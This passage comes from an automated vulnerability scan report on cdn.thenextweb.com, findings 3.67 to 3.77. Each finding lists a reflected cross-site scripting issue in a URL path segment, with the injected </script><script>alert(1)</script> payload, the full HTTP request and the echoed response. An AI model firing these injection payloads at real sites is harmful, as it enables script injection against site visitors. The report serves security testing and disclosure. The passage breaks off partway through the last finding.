    'current_url': '/wp-content/themesb9191</script><script>alert(1)</script>ac3d12fa4c7/tnw_6/static/fonts/proximanova-regular-webfont.woff'
    };
</script>
...[SNIP]...

3.67. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b58d0</script><script>alert(1)</script>6d865618bfe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_6b58d0</script><script>alert(1)</script>6d865618bfe/static/fonts/proximanova-regular-webfont.woff HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.0.144
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:59 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=nl4ih5eksgu2a01lc1j3t8b9i5; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:43:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26123
Date: Wed, 05 Oct 2011 20:56:25 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
avascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6b58d0</script><script>alert(1)</script>6d865618bfe/static/fonts/proximanova-regular-webfont.woff'
    };
</script>
...[SNIP]...

3.68. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d8ce</script><script>alert(1)</script>50879ddfa23 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_6/static4d8ce</script><script>alert(1)</script>50879ddfa23/fonts/proximanova-regular-webfont.woff HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.0.144
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:43:23 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=35dd28418mn8nlor7lqe19i042; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:43:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26123
Date: Wed, 05 Oct 2011 20:56:49 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
pt">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/static4d8ce</script><script>alert(1)</script>50879ddfa23/fonts/proximanova-regular-webfont.woff'
    };
</script>
...[SNIP]...

3.69. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b1a7</script><script>alert(1)</script>b86cea24919 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_6/static/fonts7b1a7</script><script>alert(1)</script>b86cea24919/proximanova-regular-webfont.woff HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 127.0.0.1
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:57:13 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=89ifn7oegpuv8vvsvtduq7eit1; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:57:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26123
Date: Wed, 05 Oct 2011 20:57:14 GMT
Age: 1
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/static/fonts7b1a7</script><script>alert(1)</script>b86cea24919/proximanova-regular-webfont.woff'
    };
</script>
...[SNIP]...

3.70. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 549bd</script><script>alert(1)</script>5f79a462611 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff549bd</script><script>alert(1)</script>5f79a462611 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 127.0.0.1
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:57:38 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=1sscjgh6sv2ut9f79fbahhrpq5; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:57:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26123
Date: Wed, 05 Oct 2011 20:57:40 GMT
Age: 1
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
ite_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff549bd</script><script>alert(1)</script>5f79a462611'
    };
</script>
...[SNIP]...

3.71. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/spreadus_button.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13602</script><script>alert(1)</script>bb3f400fab5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content13602</script><script>alert(1)</script>bb3f400fab5/themes/tnw_6/static/images/spreadus_button.png?version=1 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:00 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=f3t4um03up2ublq6e26fqdfd06; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26121
Date: Wed, 05 Oct 2011 20:55:30 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
type="text/javascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content13602</script><script>alert(1)</script>bb3f400fab5/themes/tnw_6/static/images/spreadus_button.png?version=1'
    };
</script>
...[SNIP]...

3.72. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/spreadus_button.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9ab6</script><script>alert(1)</script>3a004a720e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themesb9ab6</script><script>alert(1)</script>3a004a720e/tnw_6/static/images/spreadus_button.png?version=1 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:09 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=jp7bqaq7um9e8cb8predar8am5; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26120
Date: Wed, 05 Oct 2011 20:55:38 GMT
Age: 1
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
text/javascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themesb9ab6</script><script>alert(1)</script>3a004a720e/tnw_6/static/images/spreadus_button.png?version=1'
    };
</script>
...[SNIP]...

3.73. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/spreadus_button.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34f5b</script><script>alert(1)</script>1c9d2aad0c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_634f5b</script><script>alert(1)</script>1c9d2aad0c5/static/images/spreadus_button.png?version=1 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:17 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=sfv4qhbck9tmkc3u4a85643qi2; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26121
Date: Wed, 05 Oct 2011 20:55:47 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
avascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_634f5b</script><script>alert(1)</script>1c9d2aad0c5/static/images/spreadus_button.png?version=1'
    };
</script>
...[SNIP]...

3.74. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/spreadus_button.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4f70</script><script>alert(1)</script>a826a25cbfe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_6/staticd4f70</script><script>alert(1)</script>a826a25cbfe/images/spreadus_button.png?version=1 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:25 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=ueglsb74c9u9jgaffut3aep3q4; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26121
Date: Wed, 05 Oct 2011 20:55:54 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
pt">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/staticd4f70</script><script>alert(1)</script>a826a25cbfe/images/spreadus_button.png?version=1'
    };
</script>
...[SNIP]...

3.75. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/spreadus_button.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1041</script><script>alert(1)</script>c2ae652104c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_6/static/imagese1041</script><script>alert(1)</script>c2ae652104c/spreadus_button.png?version=1 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:32 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=jijgge41vtiuiu247b37nan9r4; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26121
Date: Wed, 05 Oct 2011 20:56:01 GMT
Age: 1
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/static/imagese1041</script><script>alert(1)</script>c2ae652104c/spreadus_button.png?version=1'
    };
</script>
...[SNIP]...

3.76. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/spreadus_button.png

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21bcc</script><script>alert(1)</script>54d465d8e71 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_6/static/images/spreadus_button.png21bcc</script><script>alert(1)</script>54d465d8e71?version=1 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:47 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=avjk21h7g81874vr8ujsctdhr4; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26121
Date: Wed, 05 Oct 2011 20:56:16 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...

    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/static/images/spreadus_button.png21bcc</script><script>alert(1)</script>54d465d8e71?version=1'
    };
</script>
...[SNIP]...

3.77. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/sprite.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a656</script><script>alert(1)</script>934b12ee9b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content2a656</script><script>alert(1)</script>934b12ee9b9/themes/tnw_6/static/images/sprite.png?version=5 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

